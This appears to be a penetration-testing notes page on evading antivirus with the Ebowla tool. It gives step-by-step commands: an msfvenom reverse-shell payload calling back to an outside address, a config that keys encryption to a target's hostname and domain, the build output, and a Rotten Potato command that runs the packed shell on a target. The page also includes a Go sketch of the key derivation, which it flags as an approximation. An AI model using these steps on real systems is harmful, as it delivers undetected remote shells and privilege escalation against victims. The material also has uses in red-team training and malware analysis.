
# Anti-Virus Evasion

## GitHub Code

{% embed url="<https://github.com/Genetic-Malware/Ebowla>" %}

Ebowla works by encrypting the payload of the executable with a key derived from environment variables. In this example, we are going to use the following environment variables. These variables can easily be gathered from a victim box using **`systeminfo`**, **`hostname`**, etc.

**Hostname**: boxy01\
**Domain**: WTH

## The Config File

These are the basic things to change in order to get going with Ebowla. Basically, you specify the output type you want (GO, Python or PowerShell). You tell the code what kind of payload is going to be fed to the software (DLL, EXE, etc.) and finally you specify the environment variables to have some control over the way the payload gets encrypted and executed. This is extremely useful because if you just want to target a single user, you can specify the username and the generated code won't work if executed under other usernames. However, if you want to be able to use this code on all computers in a domain such as **WTH.LOCAL**, you can set this as the environment variable and the code will work on ALL computers as long as they are part of the specified domain.

![Template output](/files/-M1nFti1E8tDPSxMyfyp)

![Type of file being fed to Ebowla](/files/-M1nG2W7HyWAzBVeeFe6)

![Environment Variables](/files/-M1nGNXhBxTEpAy1UnG7)

## Our Config

```bash
# vim genetic.config

# Template output: GO, Python, or PowerShell
output_type = GO

# Type of file fed to Ebowla
payload_type = EXE

# Environment variables (empty values are not used as part of the key)
[[ENV_VAR]]
    username = ''
    computername = 'boxy01'
    homepath = ''
    homedrive = ''
    Number_of_processors = ''
    processor_identifier = ''
    processor_revision = ''
    userdomain = 'WTH.LOCAL'
    systemdrive = ''
    userprofile = ''
    path = ''
    temp = ''
```

## Generate the Executable

```bash
# Using msfvenom to generate the payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.2.3.4 LPORT=6666 -f exe -a x64 -o shell_6666.exe

# Checking the file
file shell_6666.exe
shell_6666.exe: PE32+ executable (GUI) x86-64, for MS Windows
```

## Running Ebowla with Payload

This generates the GO file.

```bash
# python ebowla.py shell_6666.exe genetic.config
[*] Using Symmetric encryption
[*] Payload length 7168
[*] Payload_type exe
[*] Using EXE payload template
[*] Used environment variables:
	[-] environment value used: computername, value used: boxy01
	[-] environment value used: userdomain, value used: wth.local
[!] Path string not used as pasrt of key
[!] External IP mask NOT used as part of key
[!] System time mask NOT used as part of key
[*] String used to source the encryption key: boxy01wth.local
[*] Applying 10000 sha512 hash iterations before encryption
[*] Encryption key: 967e1552331f3b8cccbcea0bfff30a964fb2a56953ebfbe5bd5c474d9d1a6b5c   
[*] Writing GO payload to: go_symmetric_shell_6666.exe.go

# Generated File
ls output/
go_symmetric_shell_6666.exe.go
```
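The keying step visible in that output, as an added model (not Ebowla's own code): the configured environment values are lowercased and concatenated ("boxy01" + "WTH.LOCAL" gives the "boxy01wth.local" source string above), run through iterated SHA-512, and the result keys the cipher, so a sandbox or analyst box with a different hostname or domain derives the wrong key and the payload never decrypts. This is why detonation outside the target environment stays inert and why an analyst needs the victim's actual hostname and domain to reproduce the decryption. The exact hash chaining, key truncation and cipher (AES-256-GCM here) are assumptions, so this will not reproduce the key value printed above.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha512"
	"strings"
)

var nonce = make([]byte, 12) // fixed: each derived key protects exactly one blob

// KeySource lowercases the configured values and concatenates them in config
// order; empty config values contribute nothing, as in the run above.
func KeySource(values ...string) string {
	src := ""
	for _, v := range values {
		src += strings.ToLower(v)
	}
	return src
}

// DeriveKey iterates SHA-512 over the source and keeps 32 bytes for AES-256.
// Assumption: Ebowla's exact chaining and truncation may differ from this.
func DeriveKey(source string, iterations int) []byte {
	buf := []byte(source)
	for i := 0; i < iterations; i++ {
		sum := sha512.Sum512(buf)
		buf = sum[:]
	}
	return buf[:32]
}

// Keyed returns the AES-256-GCM instance a host derives from its own
// environment values; the key itself is never stored in the sample.
func Keyed(iterations int, values ...string) (cipher.AEAD, error) {
	block, err := aes.NewCipher(DeriveKey(KeySource(values...), iterations))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Unlock is the run-time step: a host whose name or domain differs derives a
// different key, GCM authentication fails, and the payload never decrypts.
func Unlock(sealed []byte, iterations int, values ...string) ([]byte, error) {
	gcm, err := Keyed(iterations, values...)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, nonce, sealed, nil)
}
```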

## Building the Final Executable

```bash
# Build the executable from the generated GO file and write it to output/
./build_x64_go.sh output/go_symmetric_shell_6666.exe.go wth_boxy01.exe
[*] Copy Files to tmp for building
[*] Building...
[*] Building complete
[*] Copy wth_boxy01.exe to output
[*] Cleaning up
[*] Done


# ls output/
go_symmetric_shell_6666.exe.go  wth_boxy01.exe
```

## Uses for the executable

This can easily be used with Rotten Potato. You can get the exe file from the linked page and execute it on the target.

{% embed url="<https://decoder.cloud/2018/01/13/potato-and-tokens/>" %}

```bash
C:\path\to\executable\lonelypotato.exe * wth_boxy01.exe
```
